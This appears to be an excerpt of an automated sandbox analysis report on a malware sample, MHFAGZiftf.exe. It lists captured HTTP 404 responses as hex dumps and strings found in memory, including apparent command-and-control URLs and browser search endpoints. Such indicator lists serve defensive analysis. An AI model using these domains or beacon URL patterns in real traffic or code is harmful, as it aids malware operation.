xwR{z`px)0c(Eb%Wg`0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 810content-encoding: brvary: Accept-Encodingdate: Mon, 05 Aug 2024 13:32:21 GMTserver: LiteSpeedData Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01 Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/5.6.40content-type: text/html; charset=UTF-8content-length: 2247date: Mon, 05 Aug 2024 13:32:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 64 68 6f 73 74 69 6e 67 2e 70 6c 20 2d 20 70 6f 64 20 74 79 6d 20 61 64 72 65 73 65 6d 20 6e 69 65 20 7a 6e 61 6a 64 75 6a 65 20 73 69 c4 99 20 c5 bc 61 64 65 6e 20 73 65 72 77 69 73 20 57 57 57 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 33 33 33 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 69 6d 67 7b 0d 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 23 74 72 65 73 63 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 7d 0d 0a 23 66 6f 6f 74 7b 0d 0a 66 6f 6e 74 3a 20 31 30 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 62 6f 74 74 6f 6d 3a 35 70 78 3b 0d 0a 77 69 64 74 68 3a 39 39 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 3a 6c 69 6e 6b 2c 20 2e 66 3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Aug 2024 13:32:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Aug 2024 13:32:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Aug 2024 13:32:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 05 Aug 2024 13:32:51 GMTContent-Type: text/htmlContent-Length: 552Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:32:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Aug 2024 13:33:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&amp;efM=bNQ0/ONSUiz8CveulmeeGbtq
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000043B8000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.0000000002DB8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq
            Source: MHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol
            Source: MHFAGZiftf.exe, 00000007.00000002.4113899205.0000000004B78000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lfghtko.lol/yxos/
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/domeny.html
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/bledyhttp/hosting.html
            Source: schtasks.exe, 00000004.00000002.4112702566.00000000046DC000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/img/logo.svg
            Source: MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000030DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dhosting.pl/kontakt
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
